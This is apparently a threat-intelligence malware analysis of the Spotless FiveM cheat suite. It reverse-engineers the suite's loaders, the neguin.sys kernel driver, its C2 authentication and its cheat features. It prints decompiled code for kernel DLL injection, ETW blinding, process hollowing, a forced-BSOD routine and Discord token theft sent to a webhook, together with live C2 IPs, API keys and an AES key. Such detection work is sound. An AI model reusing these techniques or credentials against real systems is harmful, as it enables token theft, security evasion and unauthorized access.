Sections .text 0xd2e00 · .rdata 0x23c00 · .data 0x130040 · .pdata 0x3600 * Contains http://93.127.141.9:5000, 470752974bfe5c36, /api/ep/hwid-whitelist-check, webhookUrl, api.ipify.org, discord.com, and the hardcoded Discord webhook path. * Login and session strings match the other loaders: Discord ID, password length checks, Login failed, Invalid session, /api/ep/init, sessionid, /api/keys/use, and /api/blacklist/check. * Imports CreateRemoteThreadEx, WriteProcessMemory, WTSQueryUserToken, RegOpenKeyExW, RegSetValueExW, CryptDeriveKey, CryptDecrypt, and D3D11CreateDeviceAndSwapChain. * Runtime strings include \\\\.\\VolCache, C:\\Windows\\System32\\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, and swft/1.0 passed to WinHttpOpen. * Build path leaks C:\\Users\\Gun\\Desktop\\Kernel-Spotless\\KPrivate\\Kernel-UI-Protected\\ext\\backends\\imgui\\. DECOMP\_kCUGOZADO\_SLT.dll.txt kCUGOZADO\_SLT.dll · slotted tier loader 5.48 MB 1,255 Funcs 1,279 Strings 324 Imports Slotted build. Function counts and imports line up closely with CTM/PVT, while path artifacts identify the Slotted branch. Sections .text 0xd0a00 · .rdata 0x23800 · .data 0x130000 · .pdata 0x3400 * C2/auth strings include http://93.127.141.9:5000, 470752974bfe5c36, /api/ep/hwid-whitelist-check, /api/ep/init, /api/keys/use, and /api/blacklist/check. * The same ban and telemetry vocabulary appears: RtlAdjustPrivilege, NtRaiseHardError, BANNED, api.ipify.org, discord.com, webhookUrl, and banned. * Contains api.tzproject.com and tzproject.com, with copied stack-buffer call sites for api.tzproject.com. * Runtime strings include \\\\.\\VolCache, C:\\Windows\\System32\\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, and swft/1.0 passed to WinHttpOpen. * Build path leaks C:\\Users\\Gun\\Desktop\\aaaa\\Slotted\\Kernel-UI-Protected\\ext\\backends\\imgui\\. DECOMP\_MB.dll.txt MB.dll · private auth / C2 module 5.45 MB 1,240 Funcs 1,263 Strings 322 Imports Private/VIP control module. It carries the most explicit Spotless private identifier and repeats the auth, webhook, BSOD, TZX, and process-hollowing surfaces. Sections .text 0x84400 · .rdata 0x21c00 · .data 0x12fdb8 · .pdata 0x3400 * Strings include http://93.127.141.9:5000, FTaC7sHRNwKbrMYR, 470752974bfe5c36, SpotlessPriv2026, /api/ep/hwid-whitelist-check, /api/ep/init, and /api/keys/use. * Ban enforcement is explicit: RtlAdjustPrivilege, NtRaiseHardError, BANNED, banned, and a hardcoded Discord webhook path are all present. * Authentication UI strings enforce numeric Discord ID and password ranges of 17 to 21 characters, then track sessionid and Invalid session states. * Runtime bridge strings include \\\\.\\VolCache, C:\\Windows\\System32\\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, api.ipify.org, and swft/1.0 passed to WinHttpOpen. * TZX strings are present at api.tzproject.com and tzproject.com, and SpotlessPriv2026 is copied multiple times into data buffers. DECOMP\_neguin.sys.txt neguin.sys · kernel driver 0.28 MB 82 Funcs 208 Strings 67 Imports Small but high-impact kernel driver. The export confirms ETW tampering, VolCache disguise, manual mapping, process protection, file hiding, and a usermode DLL target. Sections .text 0x6000 · .rdata 0x1000 · .data 0x4f98 · INIT 0x800 * Imports ZwTraceControl, ZwSetSystemInformation, ZwQuerySystemInformation, IoCreateDriver, IoCreateDevice, IoCreateSymbolicLink, PsSetCreateProcessNotifyRoutine, and PsLookupProcessByProcessId. * Device strings create \\Device\\VolCache and \\DosDevices\\VolCache, with a matching \\Driver\\VolCache marker. * IOCTL scan includes 0x00222004 for manual map, 0x80002000 for token-copy logic, 0x00222414 to enable file hooks, and 0x00222418 to disable file hooks. * Hiding and anti-analysis strings include Circular Kernel Context Logger, KiSystemServiceRepeat, \\PREFETCH\\, \\PROGRAMDATA\\MICROSOFT\\WINDOWS\\WER\\REPORTARCHIVE\\, \\APPDATA\\LOCAL\\CRASHDUMPS\\, and netcom.dll. * Additional development residue includes packages.json and C:\\projects\\hello-world-dll\\Release\\x64\\hello-world.pdb, plus ObRegisterCallbacks and PsSetCreateProcessNotifyRoutine imports. DECOMP\_v3.dll.txt v3.dll · main cheat engine 15.23 MB 3,092 Funcs 2,261 Strings 197 Imports Main cheat engine with a recent build timestamp, ImGui/D3D11 overlay stack, fptable pointer storage, and extensive ESP/radar/aimbot UI strings. Sections .text 0x2afe00 · .rdata 0x363000 · .data 0xf4eac · .fptable 0x200 * Imports D3D11CreateDeviceAndSwapChain and stores a writable .fptable section at 0x180715000 with size 0x200. * Build and framework strings include May 29 2026 16:29:35 and Dear ImGui 1.91.3 WIP (19121). * Feature strings include Show Players, Electron Bypass, Enable Skeleton, Enable Box, Enable Radar, Radar Show Players, Silent Aim, Triggerbot, and Aimbot. * Additional UI artifacts include FiveMProjectorCursor\_v2, FiveMProjector\_v3, MaterialIconsOutlined-Regular, and Inter Bold 3.019 font metadata. * The UI paths construct those strings inside menu functions, showing the strings are used in rendered configuration screens rather than dead data. Cross-file conclusion The requested corpus ties the suite together from three angles: launcher targeting in `bananacomleite.exe`, usermode loader/auth behavior in `bufa.dll`, `MB.dll`, and the four `kCUGOZADO_*` tier builds, then kernel capability in `neguin.sys`. The same C2/auth strings, TZX domains, Discord webhook path, process-hollowing imports, driver IOCTLs, and FiveM process targets recur across the set, while the tier-specific build paths expose CTM, public, private, and slotted packaging. Attribution is broader than TZX/Gun: `DECOMP_bufa.dll.txt` also exposes the `swift` handle through a fivem-spoofer `kernel_hook.pdb` path, and `swft/1.0` is reused as the WinHTTP user-agent in the loader family. Developer Intelligence ---------------------- Developer 1 ### TZX **Project path:** `D:\Projets\TZX\TZX\` **Role:** Built `bananacomleite.exe`, the frontend launcher and UI layer. **Stack:** C++, Dear ImGui, libcurl 8.2.1-DEV, D3D11, nlohmann/json 3.11.2. Developer 2 ### Gun / KCustom **Project path:** `C:\Users\Gun\Desktop\aaaa\KCustom\Kernel-UI-Protected\` **Role:** Built payload DLLs including `kCUGOZADO.dll`, `MB.dll`, and `1kCUGOZADO.dll`. **Branding:** Spotless External, Spotless V3, KCustom, TZProject / DmcAuth. Developer 3 ### swift / swft **PDB path:** `C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb` **Role:** Separate fivem-spoofer driver-loader lineage pulled into `bufa.dll`. **Runtime marker:** `swft/1.0` appears as a WinHTTP user-agent in `bufa.dll`, `MB.dll`, and the `kCUGOZADO_*` loaders. The `swift` attribution is file-backed, not a guess: `DECOMP_bufa.dll.txt` contains `C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb` at `1800be878`, while `swft/1.0` appears at `1800aebce` and is passed into `WinHttpOpen`. The same user-agent string also appears in `DECOMP_MB.dll.txt` and the CTM/PBL/PVT/SLT loader exports, so the marker propagates beyond a single DLL. Language Indicator Brazilian Portuguese appears across crypt.exe, hollowing errors, and naming. The crypter uses Portuguese instructions such as `Arraste o arquivo para cima do Crypter.exe`, while `bananacomleite.exe` translates literally to “banana with milk.” The same language shows up in MB.dll process-hollowing error strings. Full Loader Chain ----------------- 1 User launches bananacomleite.exe The launcher shows a Discord ID and password login, reads `CitizenFX.ini` and `packages.json`, authenticates with the C2, then stages `bufa.dll`. 2 bufa.dll escalates, cleans, and loads the driver The bypass core runs `core::virtualizer::run` for HWID spoofing, `core::cleaner::hardware_cleaner` for ban-trace cleanup, performs WinHTTP auth using `swft/1.0`, then loads `neguin.sys`. 3 neguin.sys exposes VolCache and maps the payload The driver creates `\Device\VolCache`, handles IOCTLs including `0x222004` for manual DLL mapping and `0x80002000` for SYSTEM token copy, then protects the injected process through callbacks. 4 FiveM receives the cheat modules `fulano.dll` and `v3.dll` provide silent aim, triggerbot, ESP, radar, ElectronAC bypass logic, and exploit toggles against targeted FiveM builds. Component Analysis ------------------ bananacomleite.exe 19.7 MB launcher with libcurl, Dear ImGui 1.92.3 WIP, D3D11, certificate pinning, and 28 FiveM process target strings. bufa.dll Require-admin bypass core with WinHTTP JSON auth, CryptAPI runtime crypto, driver loading, hardware spoofing, and cleaner namespaces. neguin.sys Unsigned VolCache-disguised kernel driver with manual map, Ob callbacks, ETW blinding, token theft, and filesystem hooks. fulano.dll Cheat module v1 with its own 16 FiveM process targets, file-backed mapping support, and classic aimbot/ESP structures. v3.dll Cheat module v3 with ElectronAC anti-ESP bypass, radar, exploit menu strings, shaders, and recent May 29 2026 timestamp. crypt.exe Standalone BCrypt AES-CBC crypter with Portuguese drag-and-drop UI and plaintext key material. How We Got It ------------- 1 Client provides a DLL. We find the IP. The client gave us a single DLL from a flagged player. Static string extraction immediately surfaced `http://93.127.141.9:5000` hardcoded in the `.rdata` section — the live C2 API. A port scan showed port `8080` also open and serving files over plain HTTP. 2 Open file server. No auth. Everything downloadable. Navigating to `http://93.127.141.9:8080/` returned a directory listing with no credentials, no token, no IP restriction. The entire Spotless suite — nine binaries — was sitting there. We downloaded everything. This was a live distribution server pushing updates to customers. 3 Archive preserved, behavior validated. After the suite was recovered from the open server, we preserved the files and supporting notes for detection work. The important point for this report is where the files came from and what artifacts they contain, not the private tooling used to review them. crypt.exe Gave Away the Decrypt Workflow ---------------------------------------- DEEP\_crypt.exe.txt The decrypt procedure came from the binary itself. `crypt.exe` contains Portuguese UI strings instructing the operator to drag a payload onto `Crypter.exe`; the same utility encrypts or decrypts the file in place while preserving the extension. We confirmed the behavior locally after identifying the AES details in the file. Key Finding The AES encryption key is stored in plaintext in the global C++ initializer. The global initializer function `FUN_140001000` runs at startup before `main()`. It calls `FUN_140001820` — a string copy wrapper — with the 32-byte key passed as a literal. The key is sitting in `.rdata` at address `0x140008718`. No obfuscation, no derivation, just a string constant. From fileDEEP\_crypt.exe.txt FUNCTION : FUN\_140001000 ADDRESS : 140001000 SIZE : 45 bytes void FUN\_140001000(void) { // Copies 32-byte AES key into global buffer DAT\_14000cb40 at startup: FUN\_140001820(&DAT\_14000cb40, "ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS", 0x20); atexit(FUN\_1400071a0); return; } // Confirmed in .rdata string table: 140008718 ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS ← AES key (32 bytes) 140008740 SHA256 ← hash algorithm 140008750 DmcAuth-salt ← KDF salt 140008768 ChainingModeCBC ← cipher mode 140008788 ChainingMode ← BCrypt property name The file exposes the following BCrypt pipeline: From fileDEEP\_crypt.exe.txt // Step 1 — SHA-256 KDF over the AES key + salt "DmcAuth-salt": BCryptOpenAlgorithmProvider(&local\_b0, L"SHA256", NULL, 8); FUN\_140001820(&local\_58, "DmcAuth-salt"); // append salt BCryptCreateHash(&local\_b0, &local\_b8, ...); BCryptHashData(local\_b8, key\_buf, 0x20, 0); BCryptFinishHash(local\_b8, derived\_key, 32, 0); // Step 2 — AES-CBC symmetric key from derived bytes: BCryptOpenAlgorithmProvider(&aes\_handle, L"AES", NULL, 0); BCryptSetProperty(aes\_handle, L"ChainingMode", L"ChainingModeCBC", ...); BCryptGenerateSymmetricKey(aes\_handle, &key\_handle, NULL, 0, derived\_key, 32, 0); // Step 3 — Random IV + encrypt/decrypt in place (same extension): BCryptGenRandom(NULL, iv, 16, 2); BCryptEncrypt(key\_handle, plaintext, size, NULL, iv, 16, ciphertext, ...); // — or — BCryptDecrypt(key\_handle, ciphertext, size, NULL, iv, 16, plaintext, ...); The full user interface is in Brazilian Portuguese — every error message, every dialog. This is the operational note that revealed the decrypt workflow: From fileDEEP\_crypt.exe.txt 1400087c0 "Arraste o arquivo para cima do Crypter.exe." "O arquivo sera criptografado/descriptografado no proprio local (mesma extensao)." → "Drag the file onto Crypter.exe. The file will be encrypted/decrypted in place." 140008840 "Caminho do arquivo invalido." → "Invalid file path." 140008860 "Nao foi possivel abrir o arquivo." → "Could not open the file." 140008888 "Erro ao ler o arquivo." → "Error reading the file." 1400088a0 "Erro na descriptografia." → "Decryption error." 1400088c0 "Nao foi possivel escrever o arquivo." → "Could not write the file." 1400088e8 "Arquivo descriptografado com sucesso!" → "File decrypted successfully!" 140008918 "Erro na criptografia." → "Encryption error." 140008930 "Arquivo criptografado com sucesso!" → "File encrypted successfully!" C2 Server Intelligence ---------------------- Infrastructure Direct IP bypassed Cloudflare-protected domains. The payloads reference `api.tzproject.com` and `tzproject.com`, but the binary-backed direct C2 target is `93.127.141.9:5000`. The exported strings also expose the DmcAuth-style product identifier, API key, salt, session endpoints, and Discord webhook path. Primary IP93.127.141.9:5000 Domainsapi.tzproject.com / tzproject.com Product ID0026d7bf API KeyFTaC7sHRNwKbrMYR API Salt470752974bfe5c36 Webhook ID1472751394154086491 Observed API endpoint map POST /api/ep Software authentication POST /api/ep/heartbeat Keep-alive POST /api/ep/info Key and user information POST /api/ep/validate Quick key validation POST /api/ep/init Initialize session + version check POST /api/ep/hwid-whitelist-check HWID authorization POST /api/ep/auth User authentication POST /api/ep/register User registration POST /api/ep/upgrade Upgrade with new key POST /api/ep/download Download file POST /api/ep/update Download update POST /api/ep/change-password Password change POST /api/auth/login Panel login POST /api/auth/register Reseller registration GET /api/health Public server health GET /api/apps/list Application list GET /api/keys/lookup Key lookup POST /api/blacklist/check Public blacklist check POST /api/blacklist Add to blacklist GET /api/hwid-lists HWID whitelist management GET /api/analytics/access-logs Access logs GET /api/analytics/audit-logs Audit logs Authentication System --------------------- Full Auth Flow 1bananacomleite.exe shows Discord ID and password login. 2Credentials are sent to 93.127.141.9:5000/api/ep/auth. 3kCUGOZADO\_CTM.dll generates HWID from computer name and seed constants. 4POST /api/ep/hwid-whitelist-check returns allowed, not\_in\_list, suspect, or banned. 5banned status triggers NtRaiseHardError; allowed status proceeds to driver load. 6bufa.dll performs a secondary WinHTTP license check before NtLoadDriver. Hardcoded Auth Tokens API KeyFTaC7sHRNwKbrMYR Product ID0026d7bf Session Token470752974bfe5c36 AES PasswordghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS KDF SaltDmcAuth-salt WinHTTP UAswft/1.0 Client-Side Auth Weakness ------------------------- The exports show a real crackability risk: important auth decisions are made in usermode after HTTP responses are parsed. We are not publishing binary patch recipes, offsets, or opcode-level instructions, but defenders should assume cracked Spotless builds can exist where the local client reports success without a normal server round-trip. bufa.dll Gate License gating depends on a client-side WinHTTP result. `bufa.dll` imports the full WinHTTP chain, including `WinHttpSendRequest`, `WinHttpReceiveResponse`, `WinHttpQueryDataAvailable`, and `WinHttpReadData`. That makes missing or abnormal auth traffic a useful cracked-build hunt signal. HWID Gate allowed / not\_in\_list / banned are local response states. `MB.dll` and both CTM DLLs embed `allowed`, `not_in_list`, and `banned`. A tampered variant may suppress failure handling or force a local success result, so defenders should hash-hunt both original and modified payloads. Complications Cracking auth does not remove kernel and secondary checks. `neguin.sys` is unsigned and still needs a driver-loading path such as test signing, a DSE bypass, or another vulnerable-driver chain. The cheat DLLs may run secondary checks, and the driver's `ObRegisterCallbacks` protection can complicate usermode tampering after it is active. Defensive cracked-variant model Expected original behavior: launcher/auth DLL contacts 93.127.141.9:5000 HWID endpoint returns allowed / not\_in\_list / suspect / banned bufa.dll performs a secondary WinHTTP license check before driver load Plausible cracked-variant indicators: no C2 traffic before driver-load attempt WinHTTP imports present but never exercised in the auth path banned / not\_in\_list strings absent, dead, or unreachable changed hashes with the same VolCache, swft/1.0, DmcE, or webhook indicators Remaining constraints: unsigned neguin.sys still needs a driver-loading bypass cheat DLLs may contain secondary auth checks server-side sessions still validate real HWID-bearing requests Cheat Features (Complete) ------------------------- ESP System Player boxes, skeletons, head circles, health/armor bars, names, weapon display, distance, view angles, spectator list, tracers, vehicle ESP, radar, crosshair styles, Electron Bypass. Aimbot Standard aimbot, FlickBot, Silent Aim, prediction, closest-bone targeting, Triggerbot, visible checks, weapon range, miss chance, magic bullet, auto-scope, legit/rage modes. Exploits God Mode, Invisible, No Collision, NoClip, Infinite Ammo, No Reload, Rapid Fire, No Recoil, No Spread, Infinite Range, Vehicle God Mode, Solo Session, Auto TP, Strafe Macro. World / Utility Teleport presets for GTA V locations, saved custom locations, State Bags reader, Friend Helper, vehicle list, player list, friend management. Vehicle Horn Boost, Seat Belt, tyres do not burst, speed and health rendering, vehicle lock-state visibility. Stream Proofing Stream Proof mode plus anti-recording checks against NVIDIA ShadowPlay registry locations. neguin.sys — The Kernel Driver ------------------------------ SPOTLESS W DRIVERneguin.sys.txt `neguin.sys` is a 64-bit Windows kernel driver (x86:LE:64:default, ImageBase `0x140000000`) that imports exclusively from `NTOSKRNL.EXE`. "Neguin" is Brazilian Portuguese slang — consistent with the rest of the suite. The driver has a `.text` section of `0x6000` bytes and exposes a device named `\Device\VolCache` — chosen to impersonate the legitimate Windows Volume Cache driver. Kernel IOC \\Device\\VolCache created by illegitimate driver Any instance of `\Device\VolCache` or `\DosDevices\VolCache` from a driver outside `C:\Windows\System32\drivers\` is a confirmed neguin.sys indicator. Visible in WinObj or System Informer. ETW Tampering Kernel ETW tracing blinded via HalPrivateDispatchTable The driver patches `KiSystemServiceRepeat` via byte-pattern scan to intercept the Circular Kernel Context Logger — the mechanism EasyAntiCheat and BattlEye use to detect syscall-level cheat activity. Device creation — driver entry From fileSPOTLESS W DRIVERneguin.sys.txt // Driver creates VolCache device to impersonate Windows Volume Cache: RtlInitUnicodeString(local\_28, L"\\Device\\VolCache"); IoCreateDevice(param\_1, 0, local\_28, 0x22, 0x100, 0, &local\_res8); RtlInitUnicodeString(local\_18, L"\\DosDevices\\VolCache"); IoCreateSymbolicLink(local\_18, local\_28); // All 28 IRP dispatch slots set to single handler FUN\_1400021b0: for (lVar3 = 0x1c; lVar3 != 0; lVar3--) { \*puVar4 = FUN\_1400021b0; puVar4 = puVar4 + 1; } ETW hook manager — blinding kernel telemetry The driver resolves `EtwpDebuggerData` by reading 16 bytes into the `HalPrivateDispatchTable`, allocates pool memory for PMC counter configuration, then patches `KiSystemServiceRepeat` using a byte-pattern scan to suppress the kernel ETW syscall trace: From fileSPOTLESS W DRIVERneguin.sys.txt 140006270 "failed to get EtwpDebuggerData!" 1400064a0 "EtwHookManager::Initialize" 1400064c0 "failed to get HalPrivateDispatchTable address!" 140006540 "failed to find KiSystemServiceRepeat" 140006570 "EtwHookManager::TraceStackToSyscall" // ETW class names (embedded as strings): EtwInitilizer::EtwInitilizer — ETW context constructor EtwInitilizer::OpenPmcCounter — configure PMC hardware counter EtwInitilizer::StartStopTrace — enable/disable Circular Kernel Context Logger EtwHookManager::Initialize — hook KiSystemServiceRepeat EtwHookManager::TraceStackToSyscall — redirect syscall trace output // Pattern used to locate KiSystemServiceRepeat in kernel .text: xx????xxx????xx????xxx????xxx????xx? Process & thread protection — ObRegisterCallbacks From fileSPOTLESS W DRIVERneguin.sys.txt // Driver registers callbacks to block anti-cheat handle access: uVar1 = ObRegisterCallbacks(&DAT\_14000cf70, &DAT\_14000cf20); // When scanner tries to open handle to protected cheat process: FUN\_140001964(2, 0x140006ba0, "Disallow protected process access from %Iu to %Iu", uVar4); FUN\_140001964(2, 0x140006ba0, "Allow protected process access from %Iu to %Iu", uVar4); // Same for threads: "Disallow protected thread access from %Iu to %Iu" "Allow protected thread access from %Iu to %Iu" // After injection completes, the log entry: "Injection Complete. Process %d is now PROTECTED (High Level)." "Injection Complete, but failed to protect process %d. Status: %08x" IOCTL 0x222004 — manual DLL mapping into target process From fileSPOTLESS W DRIVERneguin.sys.txt // IOCTL code 0x222004 triggers kernel-mode DLL injection: if (uVar4 == 0x222004) { puVar2 = \*(uint \*\*)(param\_2 + 0x18); // read IOCTL input buffer // puVar2\[0\] = target PID // puVar2\[1\] = DLL buffer size // \*(puVar2+2) = DLL buffer pointer (usermode) // Allocate kernel pool and copy DLL from usermode: puVar5 = ExAllocatePoolWithTag(1, puVar2\[1\], 0x6754794d); // tag 'MyTg' ProbeForRead(\*(puVar2+2), puVar2\[1\], 1); memcpy(puVar5, \*(puVar2+2), puVar2\[1\]); // Allocate worker context (PID + DLL ptr + size): puVar6 = ExAllocatePoolWithTag(0, 0x18, 0x7854794d); // tag 'MyTx' \*puVar6 = (ulonglong)\*puVar2; // target PID puVar6\[1\] = (ulonglong)puVar5; // kernel DLL buffer \*(uint \*)(puVar6+2) = puVar2\[1\]; // DLL size // Spin up kernel system thread to perform the map: PsCreateSystemThread(local\_res18, 0x1fffff, 0, 0, 0, FUN\_140003c40, puVar6); // FUN\_140003c40 attaches to target EPROCESS via KeStackAttachProcess, // allocates VA via ZwAllocateVirtualMemory, and maps via MmCopyVirtualMemory. // Injected DLL: netcom.dll } The same driver export also carries `netcom.dll` as the operational mapped DLL name and a leftover test artifact: `hello-world.dll` plus the PDB path `C:\projects\hello-world-dll\Release\x64\hello-world.pdb`. That does not change the observed Spotless behavior, but it is useful attribution evidence for how the manual mapper was developed and tested. File system hooks — hiding prefetch, WER dumps, crash dumps From fileSPOTLESS W DRIVERneguin.sys.txt void FUN\_140004e70(undefined8 param\_1, longlong \*param\_2) { pcVar1 = (code \*)\*param\_2; if (pcVar1 == NtCreateFile\_exref) { pcVar2 = FUN\_1400048c0; } else if (pcVar1 == NtOpenFile\_exref) { pcVar2 = FUN\_140004be0; } else if (pcVar1 == NtQueryDirectoryFile\_exref) { pcVar2 = FUN\_140004ec0; } DAT\_14000b408 = pcVar1; // save original pointer \*param\_2 = (longlong)pcVar2; // install hook // IOCTL control strings: "IOCTL: File hooks ENABLED" "IOCTL: File hooks DISABLED" } // Paths suppressed by the hooks (anti-cheat artifact directories): \\PREFETCH\\ \\PROGRAMDATA\\MICROSOFT\\WINDOWS\\WER\\REPORTARCHIVE\\ \\APPDATA\\LOCAL\\CRASHDUMPS\\ Discord Token Theft — How It Works ---------------------------------- DEEP\_MB.dll.txt Token Theft All three Discord variants scanned. Every .ldb file read. Tokens exfiltrated to C2. The function in MB.dll calls `SHGetFolderPathA(0, 0x1a, 0, 0, buf)` to get the `%APPDATA%` path, then builds paths to Discord, Discord Canary, and Discord PTB LevelDB directories. It iterates all `*.ldb` files using `FindFirstFileA` and reads token data from each one. LevelDB `.ldb` files are how Discord stores session tokens locally. The function scans all three Discord variants simultaneously — Discord, Discord Canary, and Discord PTB. From fileDEEP\_MB.dll.txt // Step 1: Get %APPDATA% path iVar2 = SHGetFolderPathA(0, 0x1a, 0, 0, local\_268); if (iVar2 < 0) { // AppData not found — clear output and return \*param\_2 = 0; param\_2\[1\] = 0; param\_2\[2\] = 0; param\_2\[3\] = 0xf; \*(undefined1 \*)param\_2 = 0; } else { // Step 2: Copy AppData path into three separate base strings FUN\_180004e8c(local\_348 + 8, local\_268); // base for discord FUN\_180004e8c(local\_348 + 4, local\_268); // base for discordcanary FUN\_180004e8c(local\_348, local\_268); // base for discordptb // Step 3: Append LevelDB paths to each base FUN\_180016818(local\_2c8, local\_348 + 8, "\\discord\\Local Storage\\leveldb"); FUN\_180016818(local\_2a8, local\_348 + 4, "\\discordcanary\\Local Storage\\leveldb"); FUN\_180016818(local\_288, local\_348, "\\discordptb\\Local Storage\\leveldb"); // Step 4: Enumerate \*.ldb files in each directory hFindFile = FindFirstFileA((LPCSTR)lpFileName, &local\_158); if (hFindFile != (HANDLE)0xffffffffffffffff) { // Iterate all .ldb files and read token data from each // Extracted token is exfiltrated via webhook / C2 FindClose(hFindFile); } } The addresses where the three target paths are stored in `MB.dll`: From fileDEEP\_MB.dll.txt 18009c3d0 discordcanaryLocal Storageleveldb 18009c3f8 discordLocal Storageleveldb 18009c418 \*.ldb ← wildcard file pattern 18009c420 discordptbLocal Storageleveldb After extraction, token data is sent to the operator via the hardcoded Discord webhook and to the C2 server. The API payload includes a `discordId` field and `"encrypted":true`, meaning tokens are AES-encrypted using the same key from `crypt.exe` before transmission. BSOD Enforcement — Banned Machines Get Blue-Screened ---------------------------------------------------- DEEP\_MB.dll.txt Critical — Destructive Capability If the HWID check returns 'banned', the machine is forced into a Blue Screen of Death. MB.dll loads `ntdll.dll` at runtime, resolves `RtlAdjustPrivilege` and `NtRaiseHardError` via `GetProcAddress`, elevates the process privilege to SE\_SHUTDOWN\_PRIVILEGE (`0x13`), then calls `NtRaiseHardError` with error code `0xc0000420` and option `6` (OptionShutdownSystem). This is the standard BSOD-via-usermode technique. The machine crashes immediately. The BSOD path is explicit in the recovered function: From fileDEEP\_MB.dll.txt { HMODULE hModule; FARPROC pFVar1; // RtlAdjustPrivilege FARPROC pFVar2; // NtRaiseHardError undefined1 local\_res8\[8\]; undefined4 local\_res10\[2\]; hModule = GetModuleHandleA("ntdll.dll"); if (hModule != (HMODULE)0x0) { pFVar1 = GetProcAddress(hModule, "RtlAdjustPrivilege"); pcVar3 = "NtRaiseHardError"; pFVar2 = GetProcAddress(hModule, "NtRaiseHardError"); if ((pFVar1 != (FARPROC)0x0) && (pFVar2 != (FARPROC)0x0)) { // Step 1: Elevate to SE\_SHUTDOWN\_PRIVILEGE (0x13) local\_res8\[0\] = 0; (\*pFVar1)(0x13, CONCAT71((int7)((ulonglong)pcVar3 >> 8), 1), 0, local\_res8); // Step 2: Force BSOD via NtRaiseHardError local\_res10\[0\] = 0; (\*pFVar2)(0xc0000420, // STATUS\_ASSERTION\_FAILURE → BSOD trigger 0, 0, 0, 6, // OptionShutdownSystem — forces crash local\_res10); } } return; } The BSOD string constants, addresses confirmed in `.rdata`: From fileDEEP\_MB.dll.txt 1800894e0 ntdll.dll 1800894f0 RtlAdjustPrivilege ← loaded dynamically to avoid import detection 180089508 NtRaiseHardError ← loaded dynamically 18008951c BANNED ← ban status string matched before trigger This mechanism is the operator's anti-HWID-sharing enforcement. A user who shares their account credentials triggers a HWID mismatch. The server responds with `banned` status. MB.dll receives that response, calls this function, and the machine immediately BSODs. The user's machine will reboot into a crash dump analysis loop. The operator logs the ban event to their Discord webhook simultaneously. Process Hollowing — dllhost.exe as the Host ------------------------------------------- DEEP\_MB.dll.txt MB.dll implements a full RunPE / Process Hollowing subsystem. The primary target is `C:\Windows\System32\dllhost.exe` — the legitimate DCOM server launch wrapper. The cheat payload is injected into a fresh `dllhost.exe` process, which then carries the bypass code while appearing as a Windows system process in any process list. From fileDEEP\_MB.dll.txt // Hollowing launch function: if (iVar1 == 0) { iVar1 = CreateProcessAsUserA( param\_1, "C:\\Windows\\System32\\dllhost.exe", // ← hollowing target (LPSTR)0x0, (LPSECURITY\_ATTRIBUTES)0x0, (LPSECURITY\_ATTRIBUTES)0x0, 1, // bInheritHandles 4, // CREATE\_SUSPENDED — process starts paused for hollowing (LPVOID)0x0, (LPCSTR)0x0, param\_3, param\_4); } else { iVar1 = CreateProcessAsUserA( param\_1, "C:\\Windows\\System32\\dllhost.exe", (LPSTR)0x0, ..., 0x404, // CREATE\_SUSPENDED | CREATE\_UNICODE\_ENVIRONMENT local\_res10, // environment block ...); DestroyEnvironmentBlock(local\_res10); } The error strings are in Brazilian Portuguese — same developer language as `crypt.exe`: From fileDEEP\_MB.dll.txt 18009a820 "GetSubsystem (target) falhou" → "GetSubsystem (target) failed" — can't read target PE subsystem 18009a840 "Subsystem incompativel (CONSOLE vs GUI)" → "Incompatible subsystem (CONSOLE vs GUI)" 18009a870 "RunPE/RunPEReloc falhou (VirtualAllocEx/WriteProcessMemory/SetContext)" → "RunPE/RunPEReloc failed" — main injection failed 18009a9c0 "C:\\Windows\\System32\\dllhost.exe" ← primary target path 18009a9e0 "\[Loader\] Falha Process Hollowing:" → "\[Loader\] Process Hollowing Failed:" 18009aa08 "\[Loader\] Falha ao baixar:" → "\[Loader\] Download Failed:" Fallback hollowing targets also present in the string table: `chrome.exe`, `RuntimeBroker.exe`, `msedgewebview2.exe`. The injector checks process subsystem compatibility before carving — a `CONSOLE`\-subsystem target can't host a `GUI`\-subsystem payload. MB.dll — Authentication, HWID, and C2 Control --------------------------------------------- DEEP\_MB.dll.txt / extract\_MB.dll.txt `MB.dll` is the core C2 and authentication module — a large 64-bit DLL (`.text`: `0x84400` bytes, `.data`: `0x12fdb8` bytes). The release date embedded in the data section is `20.02.2026`. The developer's local build path appears in assertion strings: `C:\Users\Gun\Desktop\KCustom\Kernel-UI-Protected\src\menu\screen\Background.cpp`. Authentication flow — init and session validation Users authenticate with a Discord ID (17–21 numeric characters) and a password (17–21 characters). The init/auth path returns a `sessionid`, `expiry`, `webhookUrl`, and `command` field, with `/api/ep/init` and `/api/ep/auth` both present in the endpoint map. The session validation loop handles five distinct error states: From fileDEEP\_MB.dll.txt FUN\_1800177f0(local\_28, "Invalid session", 0) FUN\_1800177f0(local\_28, "Session expired", 0) FUN\_1800177f0(local\_28, "Invalid or unvalidated session", 0) FUN\_1800177f0(local\_28, "No active session", 0) FUN\_1800177f0(local\_28, "Session terminated", 0) // Additional login error messages surfaced to user: "Access denied - You are blacklisted" "HWID security check failed. Access denied." "Account is not paid. Please upgrade your account." "Login failed. Invalid credentials or server error." "Discord ID must be between 17 and 21 characters (numbers only)" "Password must be between 17 and 21 characters" HWID check — the full API request From fileextract\_MB.dll.txt // API endpoint: POST http://93.127.141.9:5000/api/ep/hwid-whitelist-check?listType= // Request headers (all hardcoded in .rdata): User-Agent: Loader-Protected/1.0 @ 1800895e0 API Key: FTaC7sHRNwKbrMYR @ 180089400 Salt: 470752974bfe5c36 Password: SpotlessPriv2026 ← version identifier Identifier: 0026d7bf // HWID includes: PhysicalDrive serials, GUID {557CF406-1A04-11D3-9A73-0000F81EF32E} // External IP fetched from api.ipify.org/?format=json (User-Agent: Mozilla/5.0) // Server responses: "allowed" → proceed to cheat load "not\_in\_list" → HWID not registered "suspect" → flagged, webhook notified "banned" → trigger NtRaiseHardError BSOD (see above) Discord webhook — every login and ban logged to operator From fileDEEP\_MB.dll.txt // Webhook URL hardcoded at address 0x18009a940: POST https://discord.com/api/webhooks/1472751394154086491/ 